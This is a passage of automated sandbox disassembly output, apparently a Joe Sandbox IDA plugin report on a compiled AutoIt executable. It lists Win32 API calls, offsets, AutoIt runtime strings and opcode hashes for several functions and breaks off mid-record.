                                                                                                                • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                                                                                • String ID:
                                                                                                                • API String ID: 3521893082-0
                                                                                                                • Opcode ID: e5453f81600614c4f74ba5c6d1db24ac8d5e9f7e9f53763dbdc6c9a802e05313
                                                                                                                • Instruction ID: 0e7428e41906a5b9ce65eac677a0948690b92784e245df85c24b11a942d3345c
                                                                                                                • Opcode Fuzzy Hash: e5453f81600614c4f74ba5c6d1db24ac8d5e9f7e9f53763dbdc6c9a802e05313
                                                                                                                • Instruction Fuzzy Hash: A2916171408302BFDB109F64DC48E5BBBAAFF86325F140A29F562D62E0D775D944CB62
                                                                                                                APIs
                                                                                                                • DestroyWindow.USER32 ref: 00D44956
                                                                                                                • DeleteObject.GDI32(00000000), ref: 00D44998
                                                                                                                • DeleteObject.GDI32(00000000), ref: 00D449A3
                                                                                                                • DestroyIcon.USER32(00000000), ref: 00D449AE
                                                                                                                • DestroyWindow.USER32(00000000), ref: 00D449B9
                                                                                                                • SendMessageW.USER32(?,00001308,?,00000000), ref: 00DBE179
                                                                                                                • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00DBE1B2
                                                                                                                • MoveWindow.USER32(00000000,?,?,?,?,00000000), ref: 00DBE5E0
                                                                                                                  • Part of subcall function 00D449CA: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00D44954,00000000), ref: 00D44A23
                                                                                                                • SendMessageW.USER32 ref: 00DBE627
                                                                                                                • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00DBE63E
                                                                                                                • ImageList_Destroy.COMCTL32(00000000), ref: 00DBE654
                                                                                                                • ImageList_Destroy.COMCTL32(00000000), ref: 00DBE65F
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                                                                                                • String ID: 0
                                                                                                                • API String ID: 464785882-4108050209
                                                                                                                • Opcode ID: a9c2da1eb081df36c8d923c26a6d8db09b9755fab5354efa7343fdfa7f3fc49b
                                                                                                                • Instruction ID: 8a65b10f152ff256375dfa765deffac3da1d918823495b6bba939f54ad950438
                                                                                                                • Opcode Fuzzy Hash: a9c2da1eb081df36c8d923c26a6d8db09b9755fab5354efa7343fdfa7f3fc49b
                                                                                                                • Instruction Fuzzy Hash: 97127A30600212DFDB24CF28C984BEABBE5FF45305F584569E59ADB262C731E885DBB1
                                                                                                                APIs
                                                                                                                • DestroyWindow.USER32(00000000), ref: 00D9A42A
                                                                                                                • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00D9A4E9
                                                                                                                • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 00D9A527
                                                                                                                • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 00D9A539
                                                                                                                • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00D9A57F
                                                                                                                • GetClientRect.USER32(00000000,?), ref: 00D9A58B
                                                                                                                • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00D9A5CF
                                                                                                                • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00D9A5DE
                                                                                                                • GetStockObject.GDI32(00000011), ref: 00D9A5EE
                                                                                                                • SelectObject.GDI32(00000000,00000000), ref: 00D9A5F2
                                                                                                                • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 00D9A602
                                                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00D9A60B
                                                                                                                • DeleteDC.GDI32(00000000), ref: 00D9A614
                                                                                                                • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00D9A642
                                                                                                                • SendMessageW.USER32(00000030,00000000,00000001), ref: 00D9A659
                                                                                                                • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00D9A694
                                                                                                                • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00D9A6A8
                                                                                                                • SendMessageW.USER32(00000404,00000001,00000000), ref: 00D9A6B9
                                                                                                                • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 00D9A6E9
                                                                                                                • GetStockObject.GDI32(00000011), ref: 00D9A6F4
                                                                                                                • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00D9A6FF
                                                                                                                • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 00D9A709
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                                                • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                                                • API String ID: 2910397461-517079104
                                                                                                                • Opcode ID: 6e5e2eb1abb14518a8aa6705e90c1b02f35e23117ca796d5b102fce3a8412f4c
                                                                                                                • Instruction ID: 16f6af1967c2376b36d4e47b148141251a265a8a70066605055214f6380ca005
                                                                                                                • Opcode Fuzzy Hash: 6e5e2eb1abb14518a8aa6705e90c1b02f35e23117ca796d5b102fce3a8412f4c
                                                                                                                • Instruction Fuzzy Hash: ADA14C71A40219BFEB14DBA9DD4AFAE7BB9EB04710F008114F615EB2E0D770AD44CB60
                                                                                                                APIs
                                                                                                                • SetErrorMode.KERNEL32(00000001), ref: 00D8E45E
                                                                                                                • GetDriveTypeW.KERNEL32(?,00DDDC88,?,\\.\,00DDDBF0), ref: 00D8E54B
                                                                                                                • SetErrorMode.KERNEL32(00000000,00DDDC88,?,\\.\,00DDDBF0), ref: 00D8E6B1
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorMode$DriveType
                                                                                                                • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                                                • API String ID: 2907320926-4222207086
                                                                                                                • Opcode ID: 368538f74edd70f47efeb83e654e72cb806be8f909f119ebb0619dbcc816932c
                                                                                                                • Instruction ID: 6b46cb8883a41f4cd90cef7a81824b711974419c576d7c28ca6f5912891984d7
                                                                                                                • Opcode Fuzzy Hash: 368538f74edd70f47efeb83e654e72cb806be8f909f119ebb0619dbcc816932c
                                                                                                                • Instruction Fuzzy Hash: EA51A430248305AF8610FF15C89383AB7A1EB54744B678D19F586E7291E760DE49DF72
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __wcsnicmp
                                                                                                                • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                                                                • API String ID: 1038674560-86951937
                                                                                                                • Opcode ID: afd72b321b6e82f6b405fa2f48954accc92a9d7bc70364b2e72b87cb2640cae6
                                                                                                                • Instruction ID: 1f5f7d2b04c0f6e9a7179c7d895f7e8c75846375ccb4b9abdcb59f6819c23c4f
                                                                                                                • Opcode Fuzzy Hash: afd72b321b6e82f6b405fa2f48954accc92a9d7bc70364b2e72b87cb2640cae6
                                                                                                                • Instruction Fuzzy Hash: 15613931651716BBDF71AA248C83FBA339DEF15740F181025FD86AA2C2EF60DA05D6B1
                                                                                                                APIs
                                                                                                                • CharUpperBuffW.USER32(?,?,00DDDBF0), ref: 00DA6245
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: BuffCharUpper
                                                                                                                • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                                                                                • API String ID: 3964851224-45149045
                                                                                                                • Opcode ID: 5796d3afbfb6a881c8dd4e6a211ed3f0d955548e8b9678e25eb194cdb1136630
                                                                                                                • Instruction ID: 7f1a4f5c9e5db01e64c9fd3154227eb131998a2925ffa22a776e55b3f07b5c5d
                                                                                                                • Opcode Fuzzy Hash: 5796d3afbfb6a881c8dd4e6a211ed3f0d955548e8b9678e25eb194cdb1136630
                                                                                                                • Instruction Fuzzy Hash: 20C15074204201CFCA04EF14C461A6E7796EF96394F0D8869BD865B3A6DB21DD4ECBB2
                                                                                                                APIs
                                                                                                                • GetSysColor.USER32(00000012), ref: 00DAD3BE
                                                                                                                • SetTextColor.GDI32(?,?), ref: 00DAD3C2
                                                                                                                • GetSysColorBrush.USER32(0000000F), ref: 00DAD3D8
                                                                                                                • GetSysColor.USER32(0000000F), ref: 00DAD3E3
                                                                                                                • CreateSolidBrush.GDI32(?), ref: 00DAD3E8
                                                                                                                • GetSysColor.USER32(00000011), ref: 00DAD400
                                                                                                                • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00DAD40E
                                                                                                                • SelectObject.GDI32(?,00000000), ref: 00DAD41F
                                                                                                                • SetBkColor.GDI32(?,00000000), ref: 00DAD428
                                                                                                                • SelectObject.GDI32(?,?), ref: 00DAD435
                                                                                                                • InflateRect.USER32(?,000000FF,000000FF), ref: 00DAD454
                                                                                                                • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00DAD46B
                                                                                                                • GetWindowLongW.USER32(00000000,000000F0), ref: 00DAD480
                                                                                                                • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00DAD4A8
                                                                                                                • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00DAD4CF
                                                                                                                • InflateRect.USER32(?,000000FD,000000FD), ref: 00DAD4ED
                                                                                                                • DrawFocusRect.USER32(?,?), ref: 00DAD4F8
                                                                                                                • GetSysColor.USER32(00000011), ref: 00DAD506
                                                                                                                • SetTextColor.GDI32(?,00000000), ref: 00DAD50E
                                                                                                                • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 00DAD522
                                                                                                                • SelectObject.GDI32(?,00DAD0B5), ref: 00DAD539
                                                                                                                • DeleteObject.GDI32(?), ref: 00DAD544
                                                                                                                • SelectObject.GDI32(?,?), ref: 00DAD54A
                                                                                                                • DeleteObject.GDI32(?), ref: 00DAD54F
                                                                                                                • SetTextColor.GDI32(?,?), ref: 00DAD555
                                                                                                                • SetBkColor.GDI32(?,?), ref: 00DAD55F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                                                • String ID:
                                                                                                                • API String ID: 1996641542-0
                                                                                                                • Opcode ID: a49f846d797238b95728b007319fb985e2706aa07e747982f897192d706b5e50
                                                                                                                • Instruction ID: 7c272b3b90d9810fd8bc1cd9956fc4b024328bcf50203dcb5a669793c8a2cc00
                                                                                                                • Opcode Fuzzy Hash: a49f846d797238b95728b007319fb985e2706aa07e747982f897192d706b5e50
                                                                                                                • Instruction Fuzzy Hash: C6513D7190020AAFDF109FA8DC48EAEBBBAFF09320F144525F915EB2A1D7759940DB60
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00DAB5C0
                                                                                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00DAB5D1
                                                                                                                • CharNextW.USER32(0000014E), ref: 00DAB600
                                                                                                                • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00DAB641
                                                                                                                • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00DAB657
                                                                                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00DAB668
                                                                                                                • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00DAB685
                                                                                                                • SetWindowTextW.USER32(?,0000014E), ref: 00DAB6D7
                                                                                                                • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00DAB6ED
                                                                                                                • SendMessageW.USER32(?,00001002,00000000,?), ref: 00DAB71E
                                                                                                                • _memset.LIBCMT ref: 00DAB743
                                                                                                                • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00DAB78C
                                                                                                                • _memset.LIBCMT ref: 00DAB7EB
                                                                                                                • SendMessageW.USER32 ref: 00DAB815
                                                                                                                • SendMessageW.USER32(?,00001074,?,00000001), ref: 00DAB86D
                                                                                                                • SendMessageW.USER32(?,0000133D,?,?), ref: 00DAB91A
                                                                                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 00DAB93C
                                                                                                                • GetMenuItemInfoW.USER32(?), ref: 00DAB986
                                                                                                                • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00DAB9B3
                                                                                                                • DrawMenuBar.USER32(?), ref: 00DAB9C2
                                                                                                                • SetWindowTextW.USER32(?,0000014E), ref: 00DAB9EA
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                                                                                • String ID: 0
                                                                                                                • API String ID: 1073566785-4108050209
                                                                                                                • Opcode ID: 191acaf776994425121d3179e96ff1ae2bd1478945b09cacac432e0ff8744f89
                                                                                                                • Instruction ID: fa95e9bef8abc0de1ef3ee5a3b01d4b3b08ebce54d3ccf394f7b11c42c326667
                                                                                                                • Opcode Fuzzy Hash: 191acaf776994425121d3179e96ff1ae2bd1478945b09cacac432e0ff8744f89
                                                                                                                • Instruction Fuzzy Hash: 2CE17E75900209AFDB109F90CC84EEE7BB9FF06724F148156F955AB292DB748A82DF70
                                                                                                                APIs
                                                                                                                • GetCursorPos.USER32(?), ref: 00DA7587
                                                                                                                • GetDesktopWindow.USER32 ref: 00DA759C
                                                                                                                • GetWindowRect.USER32(00000000), ref: 00DA75A3
                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00DA7605
                                                                                                                • DestroyWindow.USER32(?), ref: 00DA7631
                                                                                                                • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00DA765A
                                                                                                                • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00DA7678
                                                                                                                • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00DA769E
                                                                                                                • SendMessageW.USER32(?,00000421,?,?), ref: 00DA76B3
                                                                                                                • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00DA76C6
                                                                                                                • IsWindowVisible.USER32(?), ref: 00DA76E6
                                                                                                                • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00DA7701
                                                                                                                • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00DA7715
                                                                                                                • GetWindowRect.USER32(?,?), ref: 00DA772D
                                                                                                                • MonitorFromPoint.USER32(?,?,00000002), ref: 00DA7753
                                                                                                                • GetMonitorInfoW.USER32 ref: 00DA776D
                                                                                                                • CopyRect.USER32(?,?), ref: 00DA7784
                                                                                                                • SendMessageW.USER32(?,00000412,00000000), ref: 00DA77EF
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                                                • String ID: ($0$tooltips_class32
                                                                                                                • API String ID: 698492251-4156429822
                                                                                                                • Opcode ID: 30c20c6791ccdc25b38e8d53aac84ff606b4446710aa3bbed9e172ae66ea5cfe
                                                                                                                • Instruction ID: 09ae0b380710cde949186f2239c1c39d012aa0a0906d13cc1ae05f445eabf533
                                                                                                                • Opcode Fuzzy Hash: 30c20c6791ccdc25b38e8d53aac84ff606b4446710aa3bbed9e172ae66ea5cfe
                                                                                                                • Instruction Fuzzy Hash: 48B18B71608341AFDB44DF68CD48B6ABBE5FF89310F04891DF5999B291DB70E805CBA2
                                                                                                                APIs
                                                                                                                • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00D5A839
                                                                                                                • GetSystemMetrics.USER32(00000007), ref: 00D5A841
                                                                                                                • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00D5A86C
                                                                                                                • GetSystemMetrics.USER32(00000008), ref: 00D5A874
                                                                                                                • GetSystemMetrics.USER32(00000004), ref: 00D5A899
                                                                                                                • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00D5A8B6
                                                                                                                • AdjustWindowRectEx.USER32(000000FF,00000000,00000000,00000000), ref: 00D5A8C6
                                                                                                                • CreateWindowExW.USER32(00000000,AutoIt v3 GUI,?,00000000,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00D5A8F9
                                                                                                                • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00D5A90D
                                                                                                                • GetClientRect.USER32(00000000,000000FF), ref: 00D5A92B
                                                                                                                • GetStockObject.GDI32(00000011), ref: 00D5A947
                                                                                                                • SendMessageW.USER32(00000000,00000030,00000000), ref: 00D5A952
                                                                                                                  • Part of subcall function 00D5B736: GetCursorPos.USER32(000000FF), ref: 00D5B749
                                                                                                                  • Part of subcall function 00D5B736: ScreenToClient.USER32(00000000,000000FF), ref: 00D5B766
                                                                                                                  • Part of subcall function 00D5B736: GetAsyncKeyState.USER32(00000001), ref: 00D5B78B
                                                                                                                  • Part of subcall function 00D5B736: GetAsyncKeyState.USER32(00000002), ref: 00D5B799
                                                                                                                • SetTimer.USER32(00000000,00000000,00000028,00D5ACEE), ref: 00D5A979
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                                                • String ID: AutoIt v3 GUI
                                                                                                                • API String ID: 1458621304-248962490
                                                                                                                • Opcode ID: 750d9fa377c51a32def167d128d68505c6d06eefc030bd3ff1c56f398993f849
                                                                                                                • Instruction ID: 189d970dd9d26ce7ac77d20e7dc077ee65fbb4986101302af057118b95fa95dd
                                                                                                                • Opcode Fuzzy Hash: 750d9fa377c51a32def167d128d68505c6d06eefc030bd3ff1c56f398993f849
                                                                                                                • Instruction Fuzzy Hash: 4BB16735A0021AEFDB14DFA8CC45BEA7BA5EB48315F104229FA16EB290DB30D944CB61
                                                                                                                APIs
                                                                                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00DA3626
                                                                                                                • RegCreateKeyExW.ADVAPI32(?,?,00000000,00DDDBF0,00000000,?,00000000,?,?), ref: 00DA3694
                                                                                                                • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00DA36DC
                                                                                                                • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00DA3765
                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00DA3A85
                                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 00DA3A92
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Close$ConnectCreateRegistryValue
                                                                                                                • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                                                • API String ID: 536824911-966354055
                                                                                                                • Opcode ID: 577a770adfdaca983394c50fca3a0089481202c3159359b9ee34f8161ee6451f
                                                                                                                • Instruction ID: d894c95baef249343d783da83ad46a95a2fd296084e9662a6378973df90d9c74
                                                                                                                • Opcode Fuzzy Hash: 577a770adfdaca983394c50fca3a0089481202c3159359b9ee34f8161ee6451f
                                                                                                                • Instruction Fuzzy Hash: B1025E756046119FCB14EF28C895E2AB7E6FF89720F04845DF88A9B361DB34ED05CBA1
                                                                                                                APIs
                                                                                                                • CharUpperBuffW.USER32(?,?), ref: 00DA6A52
                                                                                                                • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00DA6B12
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
